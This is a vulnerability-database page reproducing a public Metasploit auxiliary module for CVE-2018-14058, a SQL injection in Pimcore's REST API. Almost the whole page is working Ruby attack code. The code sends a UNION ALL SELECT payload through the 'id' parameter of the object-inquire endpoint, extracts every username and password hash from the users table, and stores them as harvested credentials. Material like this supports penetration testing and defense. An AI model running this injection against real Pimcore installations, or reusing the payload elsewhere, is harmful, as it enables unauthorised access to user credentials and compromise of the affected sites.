Lucene search
K

Pimcore Gather Credentials via SQL Injection

🗓️ 19 Sep 2018 13:11:45Reported by Thongchai Silpavarangkura, N. Rai-Ngoen, Shelby PaceType 
metasploit
 metasploit
🔗 www.rapid7.com👁 32 Views

Pimcore SQL Injection to Extract Credentials

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Pimcore Gather Credentials via SQL Injection',
      'Description'    => %q{
        This module extracts the usernames and hashed passwords of all users of
        the Pimcore web service by exploiting a SQL injection vulnerability in
        Pimcore's REST API.

        Pimcore begins to create password hashes by concatenating a user's
        username, the name of the application, and the user's password in the
        format USERNAME:pimcore:PASSWORD.

        The resulting string is then used to generate an MD5 hash, and then that
        MD5 hash is used to create the final hash, which is generated using
        PHP's built-in password_hash function.
      },
      'Author'         => [ 'Thongchai Silpavarangkura', # PoC
                            'N. Rai-Ngoen',              # PoC
                            'Shelby Pace'                # Metasploit Module
                          ],
      'License'        => MSF_LICENSE,
      'References'     => [
                            [ 'CVE', '2018-14058' ],
                            [ 'EDB', '45208' ]
                          ],
      'Notes'          =>
        {
          'SideEffects' => [ IOC_IN_LOGS ]
        },
      'DisclosureDate' => '2018-08-13'
    ))

    register_options(
      [
        OptString.new('TARGETURI', [ true, 'The base path to pimcore', '/' ]),
        OptString.new('APIKEY', [ true, 'The valid API key for Pimcore REST API', '' ])
      ])
  end

  def available?
    res = send_request_cgi(
      'method'  =>  'GET',
      'uri'     =>  normalize_uri(target_uri.path)
    )

    res && res.code == 200 && res.body.include?('pimcore')
  end

  def get_creds
    api_uri = normalize_uri(target_uri.path, "/webservice/rest/object-inquire")
    cmd = "#{rand(256)}) UNION ALL SELECT CONCAT(name,\" \",password) from users#"

    res = send_request_cgi(
      'method'  =>  'GET',
      'uri'     =>  api_uri,
      'vars_get'  =>  {
        'apikey'  => datastore['APIKEY'],
        'id'      => cmd
      }
    )

    unless res
      fail_with(Failure::NotFound, 'The request returned no results.')
    end

    fail_with(Failure::NoAccess, 'API key is invalid') if res.body.include?('API request needs either a valid API key or a valid session.')

    format_results(res.get_json_document['data'])
  end

  def format_results(response)
    fail_with(Failure::NotFound, 'No data found') unless response
    creds = response.to_s.scan(/"([^\s]*)\s(\$[^(=>)]*)"/)
    fail_with(Failure::NotFound, 'Could not find any credentials') if creds.empty?

    print_good("Credentials obtained:")
    creds.each do |user, pass|
      print_good("#{user} : #{pass}")
      store_creds(user, pass)
    end
  end

  def store_creds(username, hash)
    store_valid_credential(
      user: username,
      private: hash,
      private_type: :nonreplayable_hash,
      service_data: {
        jtr_format: 'bcrypt',
        origin_type: :service,
        address: rhost,
        port: rport,
        service_name: 'mysql',
        protocol: 'tcp'
      }
    )
  end

  def run
    fail_with(Failure::NotFound, 'Could not access the Pimcore web page.') unless available?
    get_creds
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
0.1Low risk
Vulners AI Score0.1
CVSS 24
CVSS 36.5
EPSS0.2895
32